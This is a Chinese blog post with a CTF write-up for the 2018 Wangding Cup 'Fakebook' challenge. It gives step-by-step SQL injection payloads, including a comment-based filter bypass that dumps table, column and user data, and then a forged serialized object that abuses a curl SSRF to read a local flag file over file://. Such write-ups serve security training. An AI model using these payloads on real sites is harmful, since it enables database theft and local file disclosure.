首页 > 其他分享 >[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

时间:2022-10-22 23:23:13浏览次数:48  
标签:ch name no union blog 2018 网鼎杯 Fakebook select

打开题目

 

 jion注册,点击admin进入主页

 

 发现注入点no

?no=1 and 1=1 正常

?no=1 and 1=1 报错

猜列数

 

 

 

 

菜擦才能得出基本为分几次日本v人vgtr给他人给他给他给通过通过他

采列数

 

?no=1 order by 1#
?no=1 order by 2#
?no=1 order by 3#
?no=1 order by 4#
?no=1 order by 5#  // 报

 查询显示位的时候发现

?no=-1 union select 1,2,3,4#

 

 那应该是select和union不能同时出现,被过滤了,用报错注入,/**/空格绕也行

no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() 
得到表名user

 

no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'
得到列名no,username,passwd,dat
no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users
得到数据
1adminb109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}

用dirsearch扫描查到/robots.txt,访问发现有备份users.php.bak

下载后得到

<?php
 
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
 
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
 
    function get($url)
    {
        $ch = curl_init();
 
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
 
        return $output;
    }
 
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
 
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
function get($url)可能存在SSRF
在这题,查看源码发现data字段存在漏洞。

 

data得到有用数据
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}
说明注册时会序列化我们的信息,回显到页面时再反序列化。
这个data本来回显的是我们自己的博客,但我们把它改为回显flag.php就可以构成ssrf
修改自己最后blog字段内容,改为file:///var/www/html/flag.php,并把对应的s改为对应长度29

 O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";

 data字段在第4位,所以放在第4位,构造payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

 查看网页源码

 

 得到flag

标签:ch,name,no,union,blog,2018,网鼎杯,Fakebook,select
From: https://www.cnblogs.com/mu-yi2/p/16817583.html

相关文章

  • 云安全攻防体系实践-CVE-2018-15664分析
    CVE-2018-15664符号链接替换漏洞如果在docker守护进程检查复制路径时,攻击者可以利用中间的间隙,先在这里放置一个非符号链接的常规文件或目录,检查结束后,攻击者赶在Docker守护......
  • LOJ #2351. 「JOI 2018 Final」毒蛇越狱
    题面传送门奇妙的看上去不能过的题目。首先有一个非常sb的暴力,大概就是枚举?的子集,然后统计,时间复杂度\(O(2^{cnt_1})\)单次。直接算没有优化空间,考虑子集容斥,先FWT预处......
  • 中国顶级CTF竞赛网络安全大赛--2022网鼎杯re2解题思路来了,快来围观!
    作者:黑蛋一、脱壳PEID查不出来,用了die,显示是UPX3.96的壳,用了脱壳机,脱不了,只能手动脱壳,拖入x64dbg,F9运行到程序领空,很明显的特征,push:无脑使用ESP定律大法,对ESP下硬件访问......
  • 做2018微积分期中考试题......
    我TM就是个废物!还好意思说因为是竞赛生所以微积分学着没压力?一做题现原形力!2018年的九个题,三个都遇到困难了。。。。学的是个啥啊,看来不做题还是不行啊。一些总结一、......
  • 2018农大校赛(dp大法)
    0&1DescriptionInput第一行是一个不超过100的整数t,代表了样例的组数接下来有多行,每行两个整数n和k,Output对于每组输入样例,先输出它的序号标识(‘CASE1:’,‘CASE2:’,......
  • 做题记录整理图论/dfs P5022 [NOIP2018 提高组] 旅行(2022/10/19)
    P5022[NOIP2018提高组]旅行我只想出了部分分的解法。。。https://fzy.blog.luogu.org/solution-p5022#include<bits/stdc++.h>#definefor1(i,a,b)for(inti=a;i......
  • P4588 [TJOI2018]数学计算
    线段树板子题。#include<iostream>#include<cstring>usingnamespacestd;#defineintlonglongconstintN=8e5+1;intmod;intq,m;namespacest{inttree[......
  • 数据结构作业(2018/10/10)
    1.基本的a+b(+-*/%)#include<bits/stdc++.h>usingnamespacestd;intmain(){inta,b;charch;intans;scanf("%d%d%c",&a,&b,&ch);......
  • 2018 最值得关注的前端技术
    1.前言2017悄然过去,2018已经来到。人在进步,技术在发展。2018年前端有哪些领域,技术值得关注,哪些技术会兴起,哪些技术会没落。下面就我个人的判断进行一个预测判断,希望能对大家......
  • 最新出版的引用《人月神话》的书(2014-2018)(一)
    《人月神话》于1975年出版,1995年出二十周年版。自出版以来,该书被大量的书籍和文章引用,直到现在热潮不退。UMLChina摘录最近几年(2015-2018)正式出版的英文书籍(有ISBN号)中对《......